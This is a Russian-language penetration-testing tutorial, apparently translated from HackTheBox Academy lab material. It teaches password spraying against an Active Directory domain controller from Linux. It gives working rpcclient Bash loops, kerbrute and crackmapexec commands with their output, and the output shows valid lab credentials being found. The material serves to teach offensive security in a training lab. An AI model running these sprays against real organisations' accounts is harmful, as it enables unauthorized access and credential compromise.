Внутреннее напыление паролей - из Linux


Теперь, когда мы создали список слов, используя один из методов, описанных в предыдущих разделах, пришло время выполнить нашу атаку. В следующих разделах мы попрактикуемся в подборе паролей с хостов Linux и Windows. Это ключевой момент для нас, поскольку это один из двух основных способов получения учетных данных домена для доступа, но мы также должны действовать осторожно.


Password Spraying с хоста Linux

После того, как мы создали список слов, используя один из методов, показанных в предыдущем разделе, пришло время выполнить атаку. Rpcclient это отличный вариант для выполнения этой атаки из Linux. Важным соображением является то, что действительный логин не сразу виден с помощью rpcclientответа Authority Name, указывающего на успешный вход в систему. Мы можем отфильтровывать недействительные попытки входа с помощью grepping for Authority в ответе. Для выполнения атаки можно использовать следующую однострочную версию Bash (адаптированную здесь).

Использование однострочника Bash для атаки

Внутреннее напыление паролей - из Linux

for u in$(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done

Давайте попробуем это в целевой среде.

Внутреннее напыление паролей - из Linux

r00towl@htb[/htb]$ for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
Account Name: tjohnson, Authority Name: INLANEFREIGHT
Account Name: sgage, Authority Name: INLANEFREIGHT

Мы также можем использовать Kerbrute для той же атаки, что обсуждалась ранее.

Использование Kerbrute для атаки

Внутреннее напыление паролей - из Linux

r00towl@htb[/htb]$ kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt  Welcome1    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \\/ ___/ __ \\/ ___/ / / / __/ _ \\
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\\___/_/  /_.___/_/   \\__,_/\\__/\\___/

Version: dev (9cfb81e) - 02/17/22 - Ronnie Flathers @ropnop

2022/02/17 22:57:12 >  Using KDC(s):
2022/02/17 22:57:12 >  	172.16.5.5:88

2022/02/17 22:57:12 >  [+] VALID LOGIN:	 [email protected]:Welcome1
2022/02/17 22:57:12 >  Done! Tested 57 logins (1 successes) in 0.172 seconds

Существует множество других методов для выполнения ввода пароля в Linux. Еще один отличный вариант - использование CrackMapExec. Универсальный инструмент принимает текстовый файл с именами пользователей для запуска с использованием одного пароля в ходе точечной атаки. Здесь мы используем grep для +, чтобы отфильтровывать сбои при входе в систему и оттачивать только допустимые попытки входа в систему, чтобы убедиться, что мы ничего не пропустим, прокручивая множество строк вывода.

Использование CrackMapExec и фильтрация сбоев при входе в систему

Внутреннее напыление паролей - из Linux

r00towl@htb[/htb]$ sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] INLANEFREIGHT.LOCAL\\avazquez:Password123